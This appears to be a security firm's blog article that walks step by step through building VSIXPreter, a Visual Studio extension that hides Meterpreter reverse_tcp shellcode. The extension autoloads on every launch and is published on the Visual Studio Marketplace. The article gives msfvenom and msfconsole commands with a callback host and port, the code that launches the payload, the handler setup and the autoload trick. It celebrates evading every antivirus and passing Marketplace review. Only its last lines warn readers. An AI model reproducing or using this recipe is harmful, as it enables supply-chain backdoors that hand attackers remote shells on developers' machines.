Privia Security was chosen as one of Türkiye's fastest growing companies!
Privia Security was chosen as one of Türkiye's fastest growing companies!
Meterpreter is undoubtedly one of the best auxiliary tools for cybersecurity professionals. In all the tests, work, and research we conduct, we need a powerful piece of malicious code like “meterpreter”. For the cybersecurity world, conducting a security test without Meterpreter is difficult, and most people cannot even imagine it. The range of modules it offers for pivoting to other systems after infiltrating one, its small footprint, and its stability have made Meterpreter one of the most powerful tools available. This power is multiplied further when used with a good distribution method on Windows architectures. If the malicious code we develop is not going to be delivered to the target system via an exploit but will instead be used as a backdoor, the distribution method becomes just as important as the code development itself.
Meterpreter can create backdoors suitable for many types and platforms using the MSFVenom auxiliary tool. This article specifically addresses 2 topics:
GitHub: VSIXPreter
I needed a piece of malware that would integrate with Visual Studio and start automatically every time the application was launched. Starting from this need, I decided to write an add-in for Visual Studio and embed malicious code within the add-in I wrote.
First, we will write a malicious add-in for Visual Studio from within Visual Studio itself.
To write an add-in for Visual Studio, let us click “Create new project…” from the Visual Studio 2017 main screen.
To develop an add-in that will run in Visual Studio 2017, after clicking “Create New Project”, we need to select Extensibility VSIX Project. If the menu below this is empty and you cannot see the screen above, the SDK is not installed on your computer. To install the SDK, it is sufficient to click “Open Visual Studio Installer” from the “Create New Project” window.
You can install the SDK by ticking the “Visual Studio extension development” option from the screen that appears.
I created a project named VSIXPreter. With this project we will have developed an add-in for Visual Studio. When the project is created, “index.html” and “stylesheet.css” files will be created automatically. Let us delete these two files after creating the project.
We then right-click on the project, click the Add → New Item menu, and encounter the screen above. By selecting Extensibility Custom Command and naming the file “PreterCommand.cs”, we add the “cs” file in which we will code the Meterpreter to the project.
Before moving on to coding, we need to generate the Meterpreter shellcode using the MSFVenom tool. The code we generate will be produced in a format compatible with C#.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.228.127 LPORT=4444 --platform windows -f csharp
With the above command, we generate a C#-compatible shellcode that will connect to port 4444 of IP address 192.168.228.127 using the reverse_tcp method.
msfconsole -q
use windows/meterpreter/reverse_tcp
set LHOST 192.168.228.127
set LPORT 4444
generate -p windows -t csharp
We can also generate our shellcode within MSFConsole as shown above. Both methods will produce a C#-compatible shellcode. A point to be careful about is that there may be differences in the parameters used in both methods. For example, when generating a shellcode with Msfvenom the “-p” parameter specifies the payload, whereas in Msfconsole this parameter is used to specify the platform. Although both generation methods run on the same framework, the usage and function of the parameters differ.
We will need three functions to run the shellcode we created. We define these three functions as shown above. With the VirtualAlloc function, we allocate space in memory equal to the size of our shellcode. We create a thread with CreateThread, and the WaitForSingleObject function checks the validity state of a specified object.
I defined a method named RunMeterpreter, and for this method to be triggered we receive the IP and port variables in string format. The complete method that will run the Meterpreter shellcode will be as follows:
I encoded the Meterpreter shellcode with Base64 and assigned it to a variable named shellCodeRaw. I then automatically calculate the entered IP and port variables and, together with the offset value, encode 12 characters (newShellCode) with Base64 and embed them within the main shellcode. This way, instead of generating a new shellcode every time the IP address changes, it will be sufficient for me to change the IP address I defined as a string.
private void Execute(object sender, EventArgs e)
{
Task.Factory.StartNew(() => RunMeterpreter("192.168.228.127", "4444"));
}
We have written our method that will run the Meterpreter shellcode. To run our method, we write the code above inside the “Execute” method — which is automatically created as a private void type — in our “PreterCommand.cs” file. With this code, we create a thread from the Task class and call the RunMeterpreter method. Our add-in is now ready. We can access the add-in by compiling the application.
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.228.127
set LPORT 4444
set ExitOnSession false
exploit -j
To receive the incoming Meterpreter connection, we start multi/handler as shown above. We can now run the vsix (Visual Studio extension) file we created to install the add-in. An important point to note is that Visual Studio 2017 must be closed when the add-in is being installed. If it is not closed, we may encounter an error in this regard when loading the application.
When our project named VSIXPreter is compiled, “VSIXPreter.dll” and “VSIXPreter.vsix” files will be created. When we double-click and run the VSIXPreter.vsix file, the VSIX Installer will run as shown above and will ask whether we want to install the application. We can install the add-in in Visual Studio 2017 by clicking “Install” on this screen.
After the installation is complete, we will see the screen above. Our add-in installation was completed successfully. By opening Visual Studio 2017 and clicking “Run PreterCommand” from the “Tools” menu, we can obtain a Meterpreter connection.
As can be seen, Run PreterCommand has been added to the Tools menu. Every time this menu item is run, our shellcode using Meterpreter reverse_tcp will be triggered and a connection will be sent to the specified address. However, at this point we will encounter the following problem: having to click Meterpreter in this Tools menu every time after installing the add-in in Visual Studio 2017 is a difficult task. For this reason, we need to write a piece of code that will automatically trigger the Meterpreter shellcode every time Visual Studio opens. But first, let us upload the “VSIXPreter.vsix” file we created to VirusTotal and look at the results.
We submitted the malware we created to VirusTotal. And — Bingo! 0/60. The malware we created is not recognised by any anti-malware product. Let us continue examining the malware we created using Process Hacker.
The VSIXPreter.dll file we created was loaded by devenv.exe and sent the connection to port 4444 of IP address 192.168.228.127. We now need to modify our code so that it runs every time Visual Studio 2017 is opened.
The PreterCommand.cs file we created will also automatically create a “PreterCommandPackage.cs” file at creation time. By defining the parameters shown above inside this file, we can ensure that the malware runs every time Visual Studio 2017 is opened.
With ProvideAutoLoad, we need to specify under which condition we want it to load automatically. The VSConstants.UICONTEXT.NoSolution_string parameter provides exactly this. Thanks to this parameter, every time Visual Studio 2017 opens, the add-in will be triggered and a Meterpreter connection will be obtained.
We can also define many AutoLoad conditions. For example, there are dozens of automatic start options available — such as when any CSharp project is opened, when the Code screen is switched to, when Debug mode is entered, when a drag operation is performed, or when a project in the background is loaded. Using the “NoSolution_string” parameter, we coded the malware to start automatically every time Visual Studio 2017 is opened. One last step remains — every time Visual Studio 2017 opens, we need to use Task to run the shellcode we defined in our RunMeterpreter method.
We can use the PreterCommandPackage() method found in our PreterCommandPackage.cs file for this purpose. By creating a new thread using the Task defined inside this method, we call the RunMeterpreter method in PreterCommand. This way, a thread will be created every time Visual Studio 2017 opens and we will obtain a Meterpreter connection without the application freezing.
We have coded our malicious Visual Studio add-in. However, we also need to distribute it. For this purpose, I chose the Visual Studio Marketplace. We can submit the malicious add-in we created to the Marketplace and make it available for download. If we develop a well-presented and attention-grabbing add-in, we can increase the likelihood of it being downloaded. In this article, I developed and uploaded an application purely as an example, and I was curious whether the Marketplace would publish the code. My prediction was correct — my code was uploaded and published within approximately 5 minutes and became available for download. To publish the malicious add-in we created on the Marketplace, we need a “Visual Studio Marketplace Publishing Portal” account. We can use any Microsoft account (Hotmail, MSN, etc.) for this account.
Let us sign in to our Visual Studio Marketplace account at the Marketplace Visualstudio address. We can then access the screen where we will upload the application by clicking “Publish extensions” on the home page. The site will redirect us to the “Manage Publishers & Extensions” page. On this page, we first define a new Publisher by clicking “Create publisher”.
The information in the form above is requested from us. The information we enter in this form is very important. This is because the developer information we enter in the Marketplace must match the Assembly information of the applications we have developed. If this information does not match, unfortunately the application cannot be published. After creating the Publisher, we can upload our application to the Marketplace.
As in the screenshot above, we click Visual Studio from the New Extension menu. The Marketplace will open a new page and ask us to upload the application we developed.
We select and upload our application, then fill in the form that appears to publish our application to the Marketplace.
After our application is uploaded, it will appear in the Extension menu as shown above. To make our application accessible to everyone, we right-click on the application and tick “Make Public”. We can then see that it is marked as “Public” in the Availability section. After our application is uploaded to the Marketplace, it is approved within approximately 5 minutes. No check is performed to determine whether it contains malicious code.
If any developer installs our malware from the Marketplace as a Visual Studio add-in, we will obtain a Meterpreter connection every time they open Visual Studio 2017.
We can install our application from the Marketplace by clicking “Extensions and Updates” from the Tools menu in Visual Studio 2017. By clicking the Online menu on the left and typing “vsixpreter” in the search field, we can see the application. By clicking Download, we can have the application downloaded and installed.
As can be seen in the screen above, our Meterpreter connection ran with process ID 31488 and the connection was sent to IP address 192.168.228.127.
Not every application on the Marketplace is safe. Always run security checks on all applications you download. Let us not forget that worse scenarios are possible — such as the theft of the source code we write.
You May Be Interested In These
